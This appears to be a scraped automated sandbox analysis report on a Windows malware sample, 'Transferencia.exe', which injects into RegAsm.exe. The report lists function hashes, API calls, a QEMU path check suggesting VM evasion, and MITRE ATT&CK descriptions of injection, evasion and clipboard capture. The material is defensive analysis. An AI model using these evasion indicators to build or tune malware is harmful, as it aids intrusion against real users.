Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: d987186f8958f664fa1318071561337cbd073873a2eafd0fde97d901f8c6610c
Instruction ID: 78df5957a288040fc2d900d761ab000ef4a978b8d9df3675bd1b164f45a137dc
Opcode Fuzzy Hash: d987186f8958f664fa1318071561337cbd073873a2eafd0fde97d901f8c6610c
Instruction Fuzzy Hash: AC01DF3134134DEFEF351F208E55FEE3B6BAF81748F084008ED4A59040D779C6A4AA12

Uniqueness

Uniqueness Score: -1.00%

Function 0137156F, Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0137468A: LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: 6b298533e090c1e4c4ce7779ec2f0d02ad5ee123d4aace40d52f4d6b61bae110
Instruction ID: e64d88ff3d5b34f3bb0a69fba278730cff2cffd22ec30704684e3fcb4135e091
Opcode Fuzzy Hash: 6b298533e090c1e4c4ce7779ec2f0d02ad5ee123d4aace40d52f4d6b61bae110
Instruction Fuzzy Hash: C901F23134134DEFEF351F208D14FEE376BAF81758F084008ED0A59000D739C664AA12

Uniqueness

Uniqueness Score: -1.00%

Function 01371587, Relevance: 1.3, APIs: 1, Instructions: 41sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0137468A: LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000315,?,01376143,00000000,000000FF,00000007,?,00000004,00000000), ref: 013716EE

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeSleepThunk
String ID:
API String ID: 145592009-0
Opcode ID: cf32073a2e3426b41f1281cca78d6661184685c54bb131003e9fe8b32d2e0694
Instruction ID: 137c77fb7a95942b2df58caabf5403a166f318b1c5d903e8264b7a6f4e6ff246
Opcode Fuzzy Hash: cf32073a2e3426b41f1281cca78d6661184685c54bb131003e9fe8b32d2e0694
Instruction Fuzzy Hash: 2601D13224938CDFDF3A5F208D14BE93B3AAF42318F084005EC4A9A001D73DC6549B12

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01374236, Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

C:\Program Files\Qemu-ga\qemu-ga.exe, xrefs: 01374355

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files\Qemu-ga\qemu-ga.exe
API String ID: 0-2445177104
Opcode ID: bc4994659978f11c35b7e148deb97586e055191f74f73e52f4c0ea3f13a6c67b
Instruction ID: 12d4e35283fbae257516d48bb31f529ecc8a5acf7b3db672d511b6a546f93fc0
Opcode Fuzzy Hash: bc4994659978f11c35b7e148deb97586e055191f74f73e52f4c0ea3f13a6c67b
Instruction Fuzzy Hash: 8031A870205305EFFB32ABBC9580BA63BAAAF0B23CF110598E9568B453D378F440C721

Uniqueness

Uniqueness Score: -1.00%

Function 0137421B, Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

C:\Program Files\Qemu-ga\qemu-ga.exe, xrefs: 01374355

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files\Qemu-ga\qemu-ga.exe
API String ID: 0-2445177104
Opcode ID: da5504eb67321b895845a3d1c9f742c3d209fd4c0eeac871bae7483b2bc0a46a
Instruction ID: 17a6a1089fbff234a037faa37ef791abed9812c877d61092d7bc6eb9ee1f9d2a
Opcode Fuzzy Hash: da5504eb67321b895845a3d1c9f742c3d209fd4c0eeac871bae7483b2bc0a46a
Instruction Fuzzy Hash: E3317870205305DFFB319B789581BA63BAA9F1727CF550198E9568B853D378F450C711

Uniqueness

Uniqueness Score: -1.00%

Function 01372684, Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2360591a535876496bdb49534d88de6f279d7d1cd0e2afb52ee38844ad7ed0e
Instruction ID: 90c879bea0d057f8a0477ce44a12cd3f4848229132a4e0f7eb0c81d8754ac586
Opcode Fuzzy Hash: c2360591a535876496bdb49534d88de6f279d7d1cd0e2afb52ee38844ad7ed0e
Instruction Fuzzy Hash: 46D175B174020AAFEF314E28CC85BEA77A5FF05358F544229FE86A7280D7BC9485DB41

Uniqueness

Uniqueness Score: -1.00%

Function 01372696, Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7a1f8cda9104e860299ca49e5c49bfa2756983627ffe1d659adf57116b9f3d
Instruction ID: 6b8ea7bcaa54f439aecbe62e078e8d60f53af94780c7f6bf67bd4fcf2192f4cb
Opcode Fuzzy Hash: aa7a1f8cda9104e860299ca49e5c49bfa2756983627ffe1d659adf57116b9f3d
Instruction Fuzzy Hash: 30511471700606EFDB359B2CCD90BE7B7E8BF06268F250229EC56D3642D728E855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01377E22, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 31feb4ccb62e27f31eadce2eb6567e5ae49edbfb2630c081512b05602409a997
Instruction ID: b0c4e4b1e2b1bd3dbfe14b3b63e85f73e52125533c0443c5154a8ee0f7f0176f
Opcode Fuzzy Hash: 31feb4ccb62e27f31eadce2eb6567e5ae49edbfb2630c081512b05602409a997
Instruction Fuzzy Hash: 4A51D770608386CFDB36CF6CC488B65BBD1AB17228F54C6D9D8968B6E7C3788446C712

Uniqueness

Uniqueness Score: -1.00%

Function 013729A6, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c0349306c3226ca616e7dd229bca9343b85cf351eca4f1ec340a36a2a162ae
Instruction ID: 73997eec29dd94b1ad3d31524676bccbe33a1c12cdb6e1fa626942a516c28fee
Opcode Fuzzy Hash: 29c0349306c3226ca616e7dd229bca9343b85cf351eca4f1ec340a36a2a162ae
Instruction Fuzzy Hash: C1413B30309385EFEB32BF7C8850BEA7BE5AF07758F494499D8829B593C3689445C712

Uniqueness

Uniqueness Score: -1.00%

Function 013726DC, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc23c91be88b3269c2e818951eada163a9ec7249aa0a595a99f48799a9c363c
Instruction ID: e0a2f0aafdce61d304a6d47da8ebe8d5fcb021ef23044529da46c3914a85bbd7
Opcode Fuzzy Hash: 9bc23c91be88b3269c2e818951eada163a9ec7249aa0a595a99f48799a9c363c
Instruction Fuzzy Hash: 34417A31704646EFDB329A2CCD40BE777E4BF06264F250239EC96D3652DB18E849CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0137299C, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1193e724c7828e69a614fd50246bd745df1e919e4b8f9df1b9c9ce0630de4f59
Instruction ID: 8a06e1a40ae888c09e57bfcea8b583a680289d7f6fc3e1408452e8c2ee1b5aaf
Opcode Fuzzy Hash: 1193e724c7828e69a614fd50246bd745df1e919e4b8f9df1b9c9ce0630de4f59
Instruction Fuzzy Hash: 18310430344345EFEB346F289C58BFA73E8BF1439CF55415AE9866B5D5C77C98808A22

Uniqueness

Uniqueness Score: -1.00%

Function 013729E7, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16411d60ff4623f723788b64748f8484babadecabce0cb6201a4659dec21839c
Instruction ID: 70e86183f29c52d2797012921b154b1387f7108632fd7c2a63d2d8f162568f90
Opcode Fuzzy Hash: 16411d60ff4623f723788b64748f8484babadecabce0cb6201a4659dec21839c
Instruction Fuzzy Hash: 2B31F430349345AFFB32AF289854FE637E5AF07748F594459EC82AB5D2C7689881C712

Uniqueness

Uniqueness Score: -1.00%

Function 01372A37, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd61b55252adff2a8cb49d0554b0ebc4a9c564d00ff83a2503f4c26bb5c6c46e
Instruction ID: e30dc6402f462a1c9c83fcea105257c69441cd08b1fd2391fc20d8c59b20450e
Opcode Fuzzy Hash: bd61b55252adff2a8cb49d0554b0ebc4a9c564d00ff83a2503f4c26bb5c6c46e
Instruction Fuzzy Hash: BA21433034A345EFFB32BF289854FE63BE5AF02B58F154499E942AB0D2C7289840C712

Uniqueness

Uniqueness Score: -1.00%

Function 01376E17, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd362b220dd4f08bb6352d15e2ddc2baef80ba54a58d612b056e73ae9bccc2be
Instruction ID: f203d0701b5ead85fcd05866cd6e808a22ba36172c7e74de916f27793544c9be
Opcode Fuzzy Hash: cd362b220dd4f08bb6352d15e2ddc2baef80ba54a58d612b056e73ae9bccc2be
Instruction Fuzzy Hash: D9F082F5319D09CFE635DA08C3F2A2573AAEF58308F814852E9468BD15C738E848C621

Uniqueness

Uniqueness Score: -1.00%

Function 01373B32, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 013760E3, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Transferencia

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: Transferencia.exe PID: 6804 Parent PID: 1280

General

Chronological Activities

Analysis Process: RegAsm.exe PID: 7052 Parent PID: 6804

Function 00416164, Relevance: 151.4, APIs: 82, Strings: 4, Instructions: 924
COMMON

Function 00417505, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Function 00401328, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
COMMON

Function 00414528, Relevance: .0, Instructions: 8
COMMON

Function 004172B8, Relevance: 10.6, APIs: 7, Instructions: 81
COMMON

Function 004173FB, Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Function 00417130, Relevance: 10.6, APIs: 7, Instructions: 62
COMMON

Function 01370BF8, Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 662
COMMON

Function 01376409, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 304
libraryCOMMON

Function 01370724, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155
nativethreadCOMMON

Function 01372C3F, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228
nativethreadCOMMON

Function 013764F1, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 211
nativethreadCOMMON

Function 013708E7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 208
nativethreadCOMMON

Function 0137084A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160
COMMON

Function 01370942, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158
nativethreadCOMMON

Function 01370878, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158
nativethreadCOMMON

Function 0137099A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
nativethreadCOMMON

Function 013709C6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
nativethreadCOMMON